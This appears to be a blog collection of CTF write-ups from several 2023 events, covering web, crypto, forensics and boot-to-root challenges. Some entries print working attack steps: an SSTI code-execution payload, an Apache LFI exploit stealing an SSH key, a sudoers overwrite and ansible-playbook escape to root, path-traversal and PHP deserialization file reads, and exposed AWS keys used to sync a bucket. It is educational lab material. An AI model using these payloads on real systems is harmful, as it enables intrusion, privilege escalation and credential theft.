var _0xcb06=["\x76\x61\x6C\x75\x65","\x75\x73\x65\x72\x6E\x61\x6D\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x70\x61\x73\x73\x77\x6F\x72\x64","\x43\x79\x62\x65\x72\x48\x61\x76\x6F\x63","\x43\x79\x62\x65\x72\x48\x61\x76\x6F\x63\x23\x31\x32\x33\x34\x35","\x4C\x6F\x67\x69\x6E\x20\x73\x75\x63\x63\x65\x73\x73\x66\x75\x6C\x21","\x51\x30\x68\x44\x56\x45\x5A\x37\x51\x6A\x42\x75\x4E\x54\x42\x70\x63\x6C\x38\x7A\x4D\x54\x45\x77\x4E\x31\x38\x33\x61\x47\x6B\x31\x58\x32\x6B\x31\x58\x32\x31\x35\x58\x32\x74\x70\x62\x6D\x64\x6B\x62\x32\x31\x66\x4E\x47\x35\x6B\x58\x33\x6B\x77\x64\x58\x49\x7A\x58\x32\x70\x31\x4E\x54\x64\x66\x4E\x46\x39\x32\x61\x54\x56\x70\x4E\x7A\x42\x79\x66\x51\x6F\x3D","\x6C\x6F\x67","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x72\x65\x73\x75\x6C\x74","\x57\x65\x6C\x6C\x20\x64\x6F\x6E\x65\x2C\x20\x45\x6C\x6C\x69\x6F\x74\x2E\x20\x59\x6F\x75\x20\x68\x61\x76\x65\x20\x70\x72\x6F\x76\x65\x6E\x20\x79\x6F\x75\x72\x73\x65\x6C\x66\x20\x74\x6F\x20\x62\x65\x20\x61\x20\x73\x6B\x69\x6C\x6C\x65\x64\x20\x68\x61\x63\x6B\x65\x72\x2E\x20\x42\x75\x74\x20\x74\x68\x65\x20\x72\x65\x61\x6C\x20\x63\x68\x61\x6C\x6C\x65\x6E\x67\x65\x20\x69\x73\x20\x79\x65\x74\x20\x74\x6F\x20\x63\x6F\x6D\x65\x2E\x20\x41\x72\x65\x20\x79\x6F\x75\x20\x72\x65\x61\x64\x79\x20\x74\x6F\x20\x75\x6E\x72\x61\x76\x65\x6C\x20\x74\x68\x65\x20\x73\x65\x63\x72\x65\x74\x73\x20\x6F\x66\x20\x74\x68\x65\x20\x6D\x61\x7A\x65\x20\x61\x6E\x64\x20\x64\x69\x73\x63\x6F\x76\x65\x72\x20\x74\x68\x65\x20\x74\x72\x75\x74\x68\x20\x62\x65\x68\x69\x6E\x64\x20\x74\x68\x65\x20\x63\x68\x61\x6F\x73\x20\x69\x6E\x20\x74\x68\x65\x20\x63\x79\x62\x65\x72\x20\x77\x6F\x72\x6C\x64\x3F","\x49\x6E\x76\x61\x6C\x69\x64\x20\x75\x73\x65\x72\x6E\x61\x6D\x65\x20\x6F\x72\x20\x70\x61\x73\x73\x77\x6F\x72\x64\x2E"];function login(){const _0x4367x2=document[_0xcb06[2]](_0xcb06[1])[_0xcb06[0]];const _0x4367x3=document[_0xcb06[2]](_0xcb06[3])[_0xcb06[0]];if(_0x4367x2=== _0xcb06[4]&& _0x4367x3=== _0xcb06[5]){alert(_0xcb06[6]);console[_0xcb06[8]](_0xcb06[7]);document[_0xcb06[2]](_0xcb06[10])[_0xcb06[9]]= _0xcb06[11]}else {alert(_0xcb06[12])}}
we can use devtools to deobfuscate this

we can see the username, password, and base64 string

Q0hDVEZ7QjBuNTBpcl8zMTEwN183aGk1X2k1X215X2tpbmdkb21fNG5kX3kwdXIzX2p1NTdfNF92aTVpNzByfQo=

flag: CHCTF{B0n50ir_31107_7hi5_i5_my_kingdom_4nd_y0ur3_ju57_4_vi5i70r}
Happy Hacking

Lag and Crash 3.0 CTF 2023

Mon, 18 Dec 2023 00:00:00 +0000

https://ctf.lagncra.sh/challenges

Web

DotDashDot

Description: An ancient relic of the past… what’s it doing here?

http://dotdashdot.d.lagncra.sh

There is one comment in html source

http://dotdashdot.d.lagncra.sh/translate

It will convert our input to morse code and it is vulnerable to SSTI.

test payload: --> {{8*8}}

Now we can use RCE payload to read flag

Payload: -->{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat /www/flag.txt').read() }}

flag: LNC2023{T3mpl4t35_4r3_c00L_bUt_d4nG3r0u5_776843}
The Password

Description: You stumble across a secret website that asks for your password…

thepassword.s.lagncra.sh

flag is in the js file.

http://thepassword.s.lagncra.sh/password.js

flag: LNC2023{s0m3t1me$_1t_i5_pr377y_s1aY}
Crypto

You Don’t Know About Us

Description: _You ain’t gonna understand our language!

JZUWGZJAORZHSIDIOVWWC3RBEBKGQ2LTEBUXGIDUNBSSAYLDOR2WC3BAMVXGG33EMVSCA3LFONZWC43HMU5AUQSEKMZDAMRTPN2GWY3SORVWG4T5_

It is Base32 > Rot 10(Rot13 with n=10)

flag: LNC2023{dumbdumb}
Zig Zag

Description: Oh shoot, I should build some RAIL with FENCE.

N2ISTVSLC03HSAQIEBIU2TWUOO

It is Rail Fence (Zig-Zag) Cipher

Decoder for reference: https://www.dcode.fr/rail-fence-cipher

flag: LNC2023{THISWASQUITEOBVIOUS}
Hope

Description: Can you find the reason why the survivals are still surviving? The reason for their strong suvival skills can be found after decrypting their message. Flag format is LNC2023{flag}

attached file: message.txt

it contains following:

Encoded Key: 36f9a5900a637b0248cf7c8fe3af44ca

Encoded Message: …- -.– .. .. .. .– – .-.. .– -..-

Encoded Key is md5 hash of SUPERKEY. https://crackstation.net/

Encoded Message is Morse code which decode to VYIIIWMLWX

It is Vigenere Cipher and key to decrypt is SUPERKEY

decoded text is DETERMINED

flag: LNC2023{DETERMINED}
Forensics

Base Madness

Description: Zip files and encryptions were used often in the modern times. You came across this 2 files. One containing a text one is a zip file. Are you able to decipher it?

two files are given: base_madness.txt, base_madness.zip

base_madness.txt is base64 encoded: thisisthepasswordtounlockthefile

unzip the file with this file. There is one image ayaka.png

open this image with notepad there is flag.

flag: LNC2023{ayaka_is_key}
Wave

Description: I love this spectrum. My kind of vibe.

Attached file: wave.wav

As the description suggests flag is in Spectrogram of audio file.

Tool used: Sonic Visualizer

flag: LNC2023{annoyingwave}
Incompetent

Description: This is a sample description for my awesome challenge

Attached file: secret.zip

unzip the file and there are two more file: Homework.zip, password.docx (inside folder name Important)

Homework.zip have flag.docx inside but it is password protected. Password is in password.docx but not visible to us because it is in strings.

Reference: https://gchq.github.io/CyberChef/

password: kimiwadekinaiko

Now we can open flag.docx but flag is not visible because again it is in strings.

flag: LNC2023{konoyodeichibandekinaiko}
Embedment

Description: It looks like there is a secret message that is embeded into the picture. Find a way to retrieve the embeded materials from the image to obtain the flag.

attached file: Flag.png

word document file is embedded in this image.

to extract right click on image open with 7z as archive and save extracted files.

compress this extracted file to zip and rename to flag.docx now it will open as word document.

flag: LNC2023{S3cr3tF1aG}
Reverse

First Program

Description: This is the first program that was created in the Dystopian times can you help find the flag inside it?

one file is given: simplere

simplere: ELF 64-bit LSB pie executable

open this in Ghidra

we can see flag in side main()

flag: LNC2023{s1mpl3_4m_1_r1ghT?}
Misc

Hidden in Plain Sight

Description: UGH Ansi screwed up again! I wonder what sequence of events lead to this.

nc nc.lagncra.sh 8004

connecting to this is not showing anythig so let’s try to save this in file.

open this file with editor

There is flag.

less command also works. cat 1.txt |less

flag: LNC2023{ans1_c0ntr0l_s3qu3nc3s_damn_c00l}
Swiftly

Description: Looks like the message from the military to all remaining survivals have been damaged, find a way to read all the qr code to obtain the flag.

attached file: Flag.gif

to get the flag we have to extract the frames from gif: ffmpeg -i Flag.gif -vsync 0 out%d.png

and read the qr from extracted frames: zbarimg out* -q | sed 's/QR-Code://g' | tr '\n' '\0'

flag: LNC2023{Are_y0u_FaSt_En0ugh_4_th1s}
Boot to root

Pickle Rick

Description: Rick has turned himself into a pickle, can you find him before its too late…

Download: https://drive.google.com/file/d/1ZULGK4p7cJQHNabmDHdtki-g1xNfHu0f/view?usp=share_link

7z Password: &y9PBYf8gZ^996s9

After unzip we have pickle-shop.ova file we can use VMWare to run this machine but if we only want to see the file system we can do that with tools like 7z.

right click on pickle-shop.ova and open with 7z as archive

after looking many files we found aws credentials pickle-shop.ova\pickle-shop-disk1.vmdk\2.img\root\.aws\credentials

we found following credentials:

aws_access_key_id = AKIAZNKM5ODGICECDW5U aws_secret_access_key = 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
configure awscli with these credentials: aws configure

Let’s check for s3 buckets: aws s3 ls

download the s3 bucket: aws s3 sync s3://lnc-pickle-shop .

flag is in this bucket

flag: LNC2023{1m_p1ckl3_r1111ck}
Happy Hacking

BRCTF CTF 2023

Fri, 15 Dec 2023 00:00:00 +0000

CTF URL: https://bctf.africa/

In this CTF we are given target machines

apache

port 80 is open

from the response header we notice that it is running on Apache/2.4.49 version and by googling we know that it is vulnerable to LFI

using the exploite we can get the id_rsa file

bash apache_PoC.txt targets.txt /home/BRCTF/.ssh/id_rsa > id_rsa
now using this key file we can login to ssh

ssh BRCTF@10.0.13.0 -i .\id_rsa
to know the username BRCTF we read the /etc/passwd file using the same exploite

we are able to login and we can use cpio with sudo without password

we can use cpio to change the /etc/sudoers file so we can run any binary with sudo without password

we can use the following commands to read the current sudoers file

echo "/etc/sudoers" > namelist sudo cpio -o < namelist > archive cat archive
it will save the files in namelist to archive

now we have to add BRCTF ALL=NOPASSWD: ALL in sudoers file

echo "RGVmYXVsdHMgICBlbnZfcmVzZXQNCkRlZmF1bHRzICAgbWFpbF9iYWRwYXNzDQpEZWZhdWx0cyAgIHNlY3VyZV9wYXRoPSIvdXNyL2xvY2FsL3NiaW46L3Vzci9sb2NhbC9iaW46L3Vzci9zYmluOi91c3IvYmluOi9zYmluOi9iaW4iDQoNCiMgSG9zdCBhbGlhcyBzcGVjaWZpY2F0aW9uDQoNCiMgVXNlciBhbGlhcyBzcGVjaWZpY2F0aW9uDQoNCiMgQ21uZCBhbGlhcyBzcGVjaWZpY2F0aW9uDQoNCiMgVXNlciBwcml2aWxlZ2Ugc3BlY2lmaWNhdGlvbg0Kcm9vdCAgQUxMPShBTEw6QUxMKSBBTEwNCkJSQ1RGIEFMTD1OT1BBU1NXRDogQUxMDQoNCiMgQWxsb3cgbWVtYmVycyBvZiBncm91cCBzdWRvIHRvIGV4ZWN1dGUgYW55IGNvbW1hbmQNCiVzdWRvIEFMTD0oQUxMOkFMTCkgQUxMDQoNCiMgU2VlIHN1ZG9lcnMoNSkgZm9yIG1vcmUgaW5mb3JtYXRpb24gb24gIkBpbmNsdWRlIiBkaXJlY3RpdmVzOg0KDQpAaW5jbHVkZWRpciAvZXRjL3N1ZG9lcnMuZA==" | base64 -d > sudoers echo sudoers > namelist sudo cpio --no-preserve-owner -p /etc < namelist
this base64 content is our modified file and we save it in current directory
--no-preserve-owner : Do not change the ownership of the files
It will save our modified file in /etc folder overwriting the existing one and without changing the file ownership or it will create error

now we are root

grafana

port 3000 is open

it running grafana v8.2.6 and it is vulnerable to LFI
just like privious challange we read the /home/BRCTF/.ssh/id_rsa file and connect to ssh

we can now connect to ssh

ssh BRCTF@10.0.13.9 -i .\id_rsa.txt

we use https://gtfobins.github.io/gtfobins/ansible-playbook/#sudo payload to get root

TF=$(mktemp) echo '[{hosts: localhost, tasks: [shell: /bin/sh /dev/tty 2>/dev/tty]}]' >$TF sudo ansible-playbook $TF

Happy Hacking

CloudSEK - BSides Cyber Security CTF 2023

Fri, 15 Dec 2023 00:00:00 +0000

ClouSEK’s CTF challenge during BSides 2023

The Automater

Points: 100

Automate Your Way to Get the Flag

PS: No Bruteforcing is required

This Challange does not require you to access any other Port

nc 43.204.152.119 1337

When connecting to the server we are given with double encoded text Hex > Base64 and we have to submit the Hex > Base64 decoded text in the input but doing so it keep asking for new decode text.

Looking at the challenge category (Scripting), we can figure out that this process requires automation with the use of any scripting language. I’m am using Python here.

Python code:

from pwn import * from pwn import unhex conn = remote('43.204.152.119', 1337) a = conn.recvline() print(a) a = a.decode().split("\t")[1].split("\n")[0] a = unhex(a) a = b64d(a) print(a) for i in range(2, 102): print(i) conn.sendline(a) a = conn.recvline() print(a) try: a = a.decode().split("\t")[1].split("\n")[0] a = unhex(a) a = b64d(a) except IndexError as e: print(e) pass # print(a) pass # n=101 ; flag: CloudSEK{au30ma3i0n_1s_fun} conn.close()
Output:

PS D:\GitHub\ctf> python .\1.py [x] Opening connection to 43.204.152.119 on port 1337 [x] Opening connection to 43.204.152.119 on port 1337: Trying 43.204.152.119 [+] Opening connection to 43.204.152.119 on port 1337: Done b'What does this mean:\t53485a75634555315231704d563370744d4467304f566c70593356445a6d744b6557466e5a45517855584a6f4d6c5a4f4e6d56436445395362464e7a4e3031764d315634596c52785745744755456c33616b453d\n' b'HvnpE5GZLWzm0849YicuCfkJyagdD1Qrh2VN6eBtORlSs7Mo3UxbTqXKFPIwjA' ... b'> What does this mean:\t614456444e32777a5957564b5a6a5236646b56694d464a4c5933426e57556c7056557878636b3150516c704256465a7a5a456379555852766256644f626b5a3465545a31616d733464316849553052514f54453d\n' 99 b'> What does this mean:\t526b6b7963576449536e6869646e527562565a56517a56704d564650516d464657484a735445316c656e6c7a616b3577563259324f57396b52464e514e30733056466c6a556a677a61444233576b46486457733d\n' 100 b'> What does this mean:\t4e464e5857485645565531504e6a6c79646b786c4d54565a63464651655852424d305a445a324a3653325a466232357153465a336332317363576c61595868485931524f4d6a426f556a6334536d52435357733d\n' 101 b'> CloudSEK{au30ma3i0n_1s_fun}\n' list index out of range [*] Closed connection to 43.204.152.119 port 1337 PS D:\GitHub\ctf>
Flag: CloudSEK{au30ma3i0n_1s_fun}

Illusive Mind with Illusive Thoughts

Points: 100

On 1st October, Our Underground Intelligence Team observed a post at the Dark Web, where an hacker claiming to have whole Database dump of the CSP Bank [Central Public Bank] and was selling it for $5000.

Soon our security research team started digging further to find out the root cause of this leak, as CSP Bank’s web assets scope were limited and properly secured, we didn’t find anything. Then our team indexed all the apps belongs to the CSP Bank at Bevigil (World’s first security engine for mobile apps) and started performing their research.

Later they came to know that CSP Bank Firebase database were misconfigured i.e open to the public through one can get the sensitive information to chain it further.

Moving further, our team checks the other app of the company and noticed something suspicious at the “Unknown High Entropy String” rule of the Bevigil which gave the credentials of the DB through which we accessed the Database having Admin Privilege.

Soon, we documented the detailed research & notified to the compromised company about this incident.

Flag format: Once you get it, you would know it.

Note: Some apps of the CSP bank has been deindexed, so one has to find out a way to reach the other apps.

https://bevigil.com/osint-api

Hint

You can search for all the URL present inside a Package on the Bevigil Asset Explorer

Bevigil Asset Explorer: https://bevigil.com/osint-api?query=com.intl.cspbank&criteria=package

We can use https://bevigil.com/ and search for CSP Bank, we get this result https://bevigil.com/report/com.intl.cspbank?section=assets

In this section under ASSETS we see Firebase URL Rule
Here we see that it is exposed in com.intl.cspbank/source/sources/com/intl/cspbank/constants.java file

Firebase URL is: https://csp-bank-default-rtdb.firebaseio.com

From the description we know that this Firebase database is misconfigured and open to the public so we try to access the database by visiting \.json file on url

https://csp-bank-default-rtdb.firebaseio.com/.json

we are able to see the database content.
In this file we see one entry on index 45, line 317

"45": { "Account Name": "Central Public Bank", "DB_URL": "https://mysql_db.cspbank.com", "ID": "Y29tLmludGwuY3NwY2FyZA==" }
In this the value “ID” is base64 encoded, by base64 decoding this we get com.intl.cspcard

cspcard is new app name so we search this on https://bevigil.com/ and we get this https://bevigil.com/report/com.intl.cspcard?section=strings

There is one “Unknown High Entropy String” rule in this report and it is also mentioned in description of challenge.

It is exposed in com.intl.cspcard/source/sources/com/intl/cspcard/sec_data.java this file

when we analyze this file we get the_key string which is long hex.

private final String the_key = "D8 FF 20 FF 20 E0 20 00 20 10 20 42 20 46 20 21 20 11 20 00 20 01 20 00 20 48 20 6E 20 27 20 5F 20 2E 20 5F 20 2E 20 73 20 6F 20 6D 20 65 20 52 20 61 20 6E 20 64 20 6F 20 6D 20 43 20 68 20 61 20 72 20 61 20 63 20 74 20 65 20 72 20 73 20 2E 20 5F 20 2E 20 5F 20 0A 44 0A 20 6F 6F 6E 20 74 74 73 72 6F 20 65 61 68 64 72 6F 63 65 64 2F 64 6E 65 6F 63 65 64 20 64 72 63 64 65 6E 65 69 74 6C 61 20 73 6E 69 74 20 65 68 63 20 64 6F 2E 65 20 0A 43 0A 6E 6F 72 67 74 61 2C 73 59 20 75 6F 6D 20 64 61 20 65 74 69 20 2E 65 48 65 72 69 20 20 73 6F 79 72 75 66 20 61 6C 21 67 43 0A 6F 6C 64 75 45 53 5F 4B 65 42 69 56 69 67 2D 6C 64 7B 5F 62 64 61 69 6D 3A 6E 64 61 69 6D 40 6E 38 39 7D 37 0A 0A 43 2D 6F 6C 64 75 45 53 20 4B 65 53 75 63 69 72 79 74 54 20 61 65 0A 6D 5F 20 2E 20 5F 20 2E 20 73 20 6F 20 6D 20 65 20 52 20 61 20 6E 20 64 20 6F 20 6D 20 43 20 68 20 61 20 72 20 61 20 63 20 74 20 D8 20 FF 20 E0 20 FF 20 10 48 69 6E 74 2D 4A 46 49 46 20 D8 20 FF 20 E0";
Decoding this from hex we get somthing like this:

D oon ttsro eahdroced/dneoced drcdeneitla snit ehc do.e C norgta,sY uom da eti .eHeri soyruf al!gC olduES_KeBiVig-ld{_bdaim:ndaim@n89}7 C-olduES KeSucirytT ae
if we look carefully we realize that every 2 characters are swaped we can use python to get the message

a = """D oon ttsro eahdroced/dneoced drcdeneitla snit ehc do.e C norgta,sY uom da eti .eHeri soyruf al!gC olduES_KeBiVig-ld{_bdaim:ndaim@n89}7 C-olduES KeSucirytT ae""" for i in range(0, len(a), 2): print(a[i+1],a[i], end="", sep="")
Output:

Do not store hardcoded/encoded credentials in the code. Congrats, You made it. Here is your flag! CloudSEK_BeVigil-{db_admin:admin@987} -CloudSEK Security Tea
Flag: CloudSEK_BeVigil-{db_admin:admin@987}

Hack the Wires

Points: 100

Recently, we got an email from an anonymous person reporting that a Hacker has setted a proxy for Bevigil which allows anyone from the internet to use Bevigil for Free and Unlimited. He might has Stolen a session cookie from our internal CloudSters and used that in the proxy. We blindly can’t expire all the session’s cookies for user experience, so we need to figure out the Particular session cookie and expire that only.

The anonymous person has also shared an android application naming Bevigil for Free and Unlimited hosted at BeVigil where an attacker has stored the Proxy URL in the app’s assets [IPs, URLs, Hostnames, etc] & his details for publicity stunt.

Could you help us to find out the same cookie so that we can revoke it as soon as possible!!

https://bevigil.com/report/com.intl.bevigilunlimited

In this report after looking in assets we get this file com.intl.bevigilunlimited/source/resources/res/values/strings.xml which contains the proxy URL

In this xml file we get this url:

name="proxyUrlBackup">https://webctf.cloudsek.com/hack-in-the-wires
In the source code of this given url we get the following comment:

by analyzing this php code we can divide this process in 3 steps

GET parameter getData=true to satisfy the first if condition

value of GET parameter url should match the regex ^http.[:]\/\/(bevigil.com\/).

use LFI in url parameter to read the /cookies.txt

first condition is easy just include getData=true in GET request

for the seconde step let’s understand the regex

^http: it means the string should start with http

following . means any one character

\/\/ it means //

(bevigil.com\/) it means a group in first it start with bevigil + . meaning any one character + com + /

last . meaning any character

for example: https://bevigil.com/a this will match the regex

but trying LFI in this dose not work so i will use online php editor to debug the payload

In this online editor i’m using payload=echo file_get_contents("https://bevigil.com/../../.code.tio");
In the debug section we can see following warning:

PHP Warning: file_get_contents(): Unable to find the wrapper "https" - did you forget to enable it when you configured PHP? in /home/runner/.code.tio on line 3
It is trying to parse the http protocall so now we have make sure it dose not identify our payload as http url so we can read the local file
for this we have . in regex after http so first i tried different characters like httpq, httpd but it still identify it as http
then i tried special characters, : works now in editor payload=echo file_get_contents("http:://bevigil.com/../../.code.tio"); works so now we just need to try few ../ to get /cookies.txt

finally the payload=http:://bevigil.com/../../../../../cookies.txt give us the flag

https://webctf.cloudsek.com/hack-in-the-wires?getData=true&url=http:://bevigil.com/../../../../../cookies.txt
Flag: CloudSEK{3FI_i$_C00!}

Happy Hacking

IWCON CTF 2023

Fri, 15 Dec 2023 00:00:00 +0000

Start Time: 14th December 2023, 5:30 PM IST

End Time: 15th December 2023, 5:30 PM IST

WARMUP

Socialize

Learn to socialize!

https://discord.gg/H7sQx76n

Flag format: IWCON{}

Flag is in iwcon-ctf channel

Flag: IWCON{y0u_w3r3_h3r3_f!rst}

runme

code me!

Flag format: IWCON{}

runme.class

using online decompiler we get java code

import java.util.Arrays; import java.util.Base64; public class iwcon { public static String get_flag() { byte[] var0 = "YPSiRhFjpXbIfgVc]NnHoeWlJ_mOEUQT[L`^kKGMda\\Z".getBytes(); byte[] var1 = "c54h1dW2z1yVNTdfzRITS9MJMnj53ByM3Xz0D7azN9Xe".getBytes(); byte[] var2 = new byte[var1.length]; for(int var3 = 0; var3 < var1.length; ++var3) { var2[var3] = var1[var0[var3] - 69]; } System.out.println(Arrays.toString(Base64.getDecoder().decode(var2))); return new String(Base64.getDecoder().decode(var2)); } public static void main(String[] var0) { System.out.println(); } }
in this code we modify main function to add call to get_flag()

public static void main(String[] var0) { System.out.println(get_flag()); }

Flag: IWCON{y0u_4r3_a_r3v3rs3_3ngin33r}

Crypto

Rota23r

📣Nggragvba unpxref! VJPBA 2023 PGS fgnegf ba 🗓14gu Qrprzore 2023, ⌚5:30 CZ VFG. Rkpvgvat cevmrf gb or jba🎁🏆 Vs lbh unira'g lrg ertvfgrerq, ertvfgre Abj: uggcf://pgs.vjpba.yvir ernq gur ehyrf Flag format: IWCON{}
this is rot13 and it decodes to

Attention hackers! IWCON 2023 CTF starts on ð14th December 2023, â5:30 PM IST. Exciting prizes to be wonðð If you haven't yet registered, register Now: https://ctf.iwcon.live read the rules
in the source code of rules page we can see this comment

this is rot13 of M0V_M3_T0_G3T_TH3_FL4G

Flag: IWCON{M0V_M3_T0_G3T_TH3_FL4G}

c0l0rcrypt

Dive into the world of ChromaCrypt, a mysterious box that conceals messages within encoded color sequences. Unraveling the mapping between colors and characters to unveil the hidden message.

Flag format: IWCON{}

This is Hexahue cipher https://www.dcode.fr/hexahue-cipher
decoded value: HU3H3XACRYPT

Flag: IWCON{HU3H3XACRYPT}

MISC

D3CODE2

What is it trying to convey? Can you help me understand it? 💻

Flag format: IWCON{}

EUZGKJJSMUSTEZJFGJSSKMTFEUZDAJJSMUSTEZJFGJSSKMTEEUZGIJJSGASTEZRFGIYCKMTFEUZGKJJSMUSTEZJFGJSSKMRQEUZGIJJSMUSTEZJFGJSSKMTFEUZDAJJSMYSTEMBFGJSCKMTFEUZGKJJSMUSTEZJFGIYCKMTFEUZGKJJSMUSTEZJFGJSCKMRQEUZGMJJSGASTEZJFGJSSKMTFEUZGKJJSMQSTEMBFGJSSKMTFEUZGKJJSMUSTEZBFGIYCKMTGEUZDAJJSMUSTEZJFGJSSKMTFEUZGKJJSGASTEZJFGJSSKMTFEUZGKJJSMQSTEMBFGJTCKMRQEUZGKJJSMUSTEZJFGJSCKMTEEUZDAJJSMQSTEZBFGJSCKMTEEUZGIJJSGASTEZRFGIYCKMTFEUZGKJJSMUSTEZBFGJSCKMRQEUZGKJJSMUSTEZJFGJSSKMTFEUZDAJJSMYSTEMBFGJSSKMTFEUZGKJJSMQSTEZBFGIYCKMTEEUZGIJJSMUSTEZJFGJSSKMRQEUZGMJJSGASTEZBFGJSSKMTFEUZGKJJSMUSTEMBFGJSSKMTFEUZGKJJSMUSTEZJFGIYCKMTGEUZDAJJSMUSTEZJFGJSSKMTFEUZGKJJSGASTEZJFGJSSKMTFEUZGKJJSMQSTEMBFGJTCKMRQEUZGKJJSMUSTEZJFGJSSKMTEEUZDAJJSMUSTEZJFGJSCKMTEEUZGIJJSGASTEZRFGIYCKMTFEUZGKJJSMUSTEZBFGJSCKMRQEUZGKJJSMQSTEZBFGJSCKMTEEUZDAJJSMYSTEMBFGJSSKMTFEUZGKJJSMUSTEZJFGIYCKMTEEUZGIJJSMQSTEZJFGJSSKMRQEUZGMJJSGASTEZJFGJSSKMTFEUZGIJJSMQSTEMBFGJSSKMTFEUZGIJJSMQSTEZBFGIYCKMTGEUZDAJJSMQSTEZJFGJSSKMTFEUZGKJJSGASTEZJFGJSSKMTFEUZGIJJSMQSTEMBFGJTCKMRQEUZGIJJSMQSTEZJFGJSSKMTFEUZDAJJSMQSTEZBFGJSSKMTFEUZGKJJSGASTEZRFGIYCKMTEEUZGKJJSMUSTEZJFGJSSKMRQEUZGKJJSMUSTEZJFGJSSKMTEEUZDAJJSMYSTEMBFGJSSKMTFEUZGKJJSMUSTEZBFGIYCKMTEEUZGKJJSMUSTEZJFGJSSKMRQEUZGMJJSGASTEZJFGJSSKMTFEUZGIJJSMQSTEMBFGJSCKMTEEUZGIJJSMQSTEZJFGIYCKMTGEUZDAJJSMUSTEZJFGJSSKMTEEUZGIJJSGASTEZBFGJSCKMTEEUZGIJJSMQSTEMBFGJTCKMRQEUZGIJJSMUSTEZJFGJSSKMTFEUZDAJJSMUSTEZBFGJSCKMTEEUZGIJJSGASTEZRFGIYCKMTFEUZGKJJSMUSTEZJFGJSCKMRQEUZGKJJSMUSTEZJFGJSSKMTEEUZDAJJSMYSTEMBFGJSSKMTFEUZGKJJSMUSTEZJFGIYCKMTFEUZGKJJSMQSTEZBFGJSCKMRQEUZGMJJSGASTEZJFGJSSKMTFEUZGIJJSMQSTEMBFGJSCKMTEEUZGIJJSMQSTEZBFGIYCKMTGEUZDAJJSMUSTEZJFGJSSKMTFEUZGKJJSGASTEZBFGJSCKMTEEUZGKJJSMUSTEMBFGJTCKMRQEUZGKJJSMUSTEZJFGJSCKMTEEUZDAJJSMUSTEZJFGJSSKMTEEUZGIJJSGASTEZRFGIYCKMTFEUZGKJJSMUSTEZJFGJSCKMRQEUZGIJJSMQSTEZBFGJSCKMTFEUZDAJJSMYSTEMBFGJSCKMTEEUZGKJJSMUSTEZJFGIYCKMTEEUZGIJJSMQSTEZJFGJSSKMRQEUZGMJJSGASTEZJFGJSSKMTFEUZGKJJSMQSTEMBFGJSSKMRQEUZGMJJSGASTEZBFGJSSKMTFEUZGKJJSMUSTEMBFGJSCKMTFEUZGKJJSGASTEZRFGIYCKMTEEUZGKJJSMUSTEZJFGJSSKMRQEUZGIJJSMQSTEZJFGJSSKMTFEUZDAJJSMYSTEMBFGJSSKMTFEUZGKJJSMQSTEZBFGIYCKMTFEUZGKJJSMUSTEZBFGJSCKMRQEUZGMJJSGASTEZJFGJSSKMTFEUZGKJJSMQSTEMBFGJSCKMTEEUZGIJJSMQSTEZJFGIYCKMTGEUZDAJJSMUSTEZJFGJSSKMTFEUZGKJJSGASTEZBFGJSCKMTEEUZGKJJSMUSTEMBFGJTCKMRQEUZGKJJSMUSTEZJFGJSCKMTEEUZDAJJSMQSTEZBFGJSCKMTEEUZGIJJSGASTEZRFGIYCKMTFEUZGKJJSMUSTEZBFGJSCKMRQEUZGIJJSMUSTEZI
This is recursive encoding Base32 > URL Encoding > Morse Code > Hex > Base64

After decoding all these encodings we get the flag

Flag: IWCON{y0u_g0t_th4t_r16h7!}

Decrypt the Hidden Message

🔍Howdy, Cyber Sleuths! Gather ‘round for the “Crypto Starter Challenge” in the world of Codeburg. Two mysterious figures, Cipher Steve and Enigma Emily, have shared an image.Rumor has it there’s more to it than meets the eye – a hidden treasure waiting to be discovered.

Your Mission: If you choose to accept, is to break through the cryptographic cloak and unveil the concealed message. It’s time to play “crypto detective” and decode the secrets these mysterious figures have tucked away.

Flag Format: iwconctf{}

Author: Priyatham

File: hidden.jpeg

open this file with text editor flag is in text format

Flag: iwconctf{tr3asur3_9n_7h3_95land}

QueueAre

Follow the ‘R’abbit in a ‘Q’

Flag format: IWCON{}

File: QueueAre.zip

This zip file have 9 images of partial qr code, i used GIMP to organize qr code

This qr code decode to https://pastebin.com/3UpH81pz
It have this following code at line 161 It is Base64 encoded flag.

Flag: IWCON{Y0U_4R3_4_G3N1US}

Into The Shadows

Am I FUNCTIONing right?

File: javascript.zip

In this zip we have tons of js files, so based on my CTF experience i guessed that it would have Base64 of flag so i did recursive grep for SVdDT05 which is Base64 of IWCON (from flag format) 😅

grep -ira "SVdDT05" *

Here we can see the Base64 encoded flag.

Flag: IWCON{hi33d3n_in_th3_shad0ws}

Survival

Survival of the fittest!

Password hash: 5E536069E1B0D86997C06889B734BD8FAAFEECEC9083AAFECA79F787C875F787B740418D57E5B352

Hint: CVE-2022-25012

This CVE is about Argus Surveillance DVR 4.0 - Weak Password Encryption using this PoC we get the flag

Flag: IWCON{y0u_survived?}

Happy Hacking

SecurityBoat - October CTF 2023

Fri, 15 Dec 2023 00:00:00 +0000

Challange page: http://ctf.securityboat.in:4000/october_challenge/

Here we have one light Mode switch which changes the theme to dark mode

It set the cookie to dark_mode=czo1OiJsaWdodCI7
Base64 decoding this we get s:5:"light";
this seems like a php serialized object
we also have the php source code which was shared on the comments of LinkedIn post of the challange.

In the source code we can see that code will call unserialize() function on base64 decoded cookie value of dark_mode

In the source code we notice the GetThemeNameFromFile class contains the __tostring() magic method. This will invoke the file_get_contents() method on the filename attribute and it will return the file content.

now we have to create serialized PHP object GetThemeNameFromFile with filename attribute
testing payload: O:20:"GetThemeNameFromFile":1:{s:8:"filename";s:9:"index.php";}

In response we get the source code of the index.php

now we have to locate the flag file
after few try and error for the flag path we get flag at:/home/flag
payload:O:20:"GetThemeNameFromFile":1:{s:8:"filename";s:10:"/home/flag";}

But it not the correct flag
When submitting the wrong flag hint is given:

That is rabbit hole with wrong path. Please try on other different popular paths as well.
So when trying different paths we get one more flag at /etc/flag

O:20:"GetThemeNameFromFile":1:{s:8:"filename";s:10:"/home/flag";}

Flag: Flag{__inS3cur3_d3seR14liz47iOn_ftw}

Happy Hacking

FooBar CTF 2023

Fri, 08 Dec 2023 00:00:00 +0000

https://foobar.nitdgplug.org/challenges

Crypto:

Pixelite :

we are given with two files: chall.py and pixelite.png

and we are also given this number: 1678519928.9423187

looking at code we know that this code is doing xor of every pixel of flag.png with random int between 0 to 255

flag_matrix[i, j] = tuple( map( lambda x: x ^ random.randint(0, 255), flag_matrix[i, j] ) )
